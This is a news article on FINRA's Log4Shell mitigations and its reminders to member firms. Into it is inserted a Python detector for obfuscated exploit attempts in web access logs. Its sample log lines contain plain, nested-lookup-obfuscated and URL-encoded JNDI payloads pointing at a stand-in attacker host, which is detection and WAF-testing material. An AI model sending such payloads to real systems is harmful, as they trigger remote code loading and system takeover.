FINRA deploys mitigation tactics against Log4J vulnerability
The United States Financial Industry Regulatory Authority (FINRA) has issued a notice regarding the Log4J vulnerability.
The Authority says it has taken immediate steps to reduce the risk. The mitigations FINRA describes are defining alerts for exploit attempts, deploying web application firewall (WAF) rules intended to block exploitation of the vulnerability, scanning to confirm that the WAF rules behave as expected, and beginning to update the Log4J libraries used in its self-developed applications. The alerts and WAF rules are compensating controls; the library update is the step that actually removes the vulnerability.
FINRA says it is tracking the vulnerability, will apply vendor software updates as they become available, and will continue to monitor for attacker exploit attempts.
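The notice does not say how FINRA's exploit-attempt alerts are built. As an added example, not FINRA's code or anything from its notice, the following Python shows the detection logic a security team would typically put behind such an alert and behind a check that a WAF rule is really firing. Log4Shell payloads are `${jndi:...}` lookups, and attackers hid that string using Log4j's own lookup syntax (`${lower:j}`, `${::-j}`, `${env:X:-j}`) and URL encoding, so a naive substring match for `${jndi:` misses them. The code resolves those lookups from the inside out before matching. The access-log lines, hostnames and addresses are constructed for the example.

```python
"""Detect Log4Shell (CVE-2021-44228) exploit attempts in web access logs.

Added example, not FINRA's code. Obfuscated payloads abuse Log4j's own
lookup syntax, so a naive search for the literal "${jndi:" misses them;
this normaliser first resolves the lookups an attacker can use to hide
the string, then matches on the result.
"""
import re
from urllib.parse import unquote

# An innermost ${...} lookup: no nested "${" inside the braces.
INNER_LOOKUP = re.compile(r"\$\{([^${}]*)\}")
# What we ultimately look for once obfuscation is undone. Log4j treats the
# lookup prefix case-insensitively, so ${JNDI:...} is just as dangerous.
JNDI_LOOKUP = re.compile(r"\$\{jndi:", re.IGNORECASE)


def resolve_lookup(expr):
    """Resolve one innermost lookup body, or return None to leave it alone.

    Handles the tricks seen most in the wild: the default-value syntax
    ${anything:-X} (covers ${::-X} and ${env:NOPE:-X}) and the
    ${lower:X} / ${upper:X} case lookups. Anything else (jndi:, date:, ...)
    is left unchanged so the final match can see it.
    """
    if ":-" in expr:
        return expr.split(":-", 1)[1]
    prefix, sep, arg = expr.partition(":")
    if sep:
        if prefix.lower() == "lower":
            return arg.lower()
        if prefix.lower() == "upper":
            return arg.upper()
    return None


def url_decode(text, max_rounds=3):
    """Undo (possibly repeated) percent-encoding of a request line."""
    for _ in range(max_rounds):
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    return text


def normalize(text, max_rounds=20):
    """Resolve nested lookups from the inside out until nothing changes."""
    text = url_decode(text)
    for _ in range(max_rounds):
        changed = False

        def replace(match):
            nonlocal changed
            resolved = resolve_lookup(match.group(1))
            if resolved is None:
                return match.group(0)
            changed = True
            return resolved

        text = INNER_LOOKUP.sub(replace, text)
        if not changed:
            break
    return text


def is_log4shell_attempt(line):
    """True if the log line carries a (possibly obfuscated) JNDI lookup."""
    return JNDI_LOOKUP.search(normalize(line)) is not None


# Constructed sample access-log lines (Apache combined format). Addresses
# and hostnames are documentation/example ranges, not real systems.
SAMPLE_LINES = [
    # benign request
    '203.0.113.5 - - [10/Dec/2021:12:00:01 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    # plain exploit attempt carried in the User-Agent header
    '198.51.100.7 - - [10/Dec/2021:12:00:02 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://attacker.example/a}"',
    # obfuscated attempt using nested lower/default lookups
    '198.51.100.8 - - [10/Dec/2021:12:00:03 +0000] "GET / HTTP/1.1" 200 512 "-" "${${lower:j}${::-n}di:${lower:ldap}://attacker.example/a}"',
    # URL-encoded attempt in the query string
    '198.51.100.9 - - [10/Dec/2021:12:00:04 +0000] "GET /search?q=%24%7Bjndi%3Aldap%3A%2F%2Fattacker.example%2Fa%7D HTTP/1.1" 404 0 "-" "curl/7.68"',
    # benign line that merely mentions log4j in a path
    '203.0.113.6 - - [10/Dec/2021:12:00:05 +0000] "GET /blog/log4j-patching HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
]


def scan(lines):
    """Return the indices of lines that should raise an alert."""
    return [i for i, line in enumerate(lines) if is_log4shell_attempt(line)]


if __name__ == "__main__":
    for i in scan(SAMPLE_LINES):
        print(f"ALERT line {i}: {normalize(SAMPLE_LINES[i])}")
```

The same obfuscated samples double as a WAF verification corpus: replaying them against the protected endpoint and confirming each one is blocked is the kind of "scan to confirm WAF rules are working" the notice refers to, and a rule that only matches the literal `${jndi:` will fail that check on the nested and encoded variants. Detection of this kind reduces exposure while systems are being patched but is not a substitute for updating the library, since the lookup syntax allows further encodings beyond the ones handled here.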
Earlier this week, FINRA issued an alert to member firms about a recently identified vulnerability in Apache Log4J, an open-source, Java-based logging utility widely used by enterprise applications and cloud services. The "Log4Shell" vulnerability (CVE-2021-44228) presents risk for member firms because they may use Log4J directly in internal applications, or it may be embedded in third-party software packages they run.
More broadly, any Java application that bundles a vulnerable Log4J version, directly or as a transitive dependency, is potentially exposed, even where the dependency is not obvious to the firm running it.
Attackers may exploit the vulnerability to compromise systems and then steal information or commit fraud. The underlying flaw allows a remote attacker to execute code on, and take control of, an affected system.
FINRA reminds firms that the U.S. Securities and Exchange Commission's (SEC) Regulation S-P Rule 30 requires firms to have written policies and procedures reasonably designed to safeguard customer records and information, and that FINRA Rule 4370 (Business Continuity Plans and Emergency Contact Information) also applies to denials of service and other interruptions to members' operations.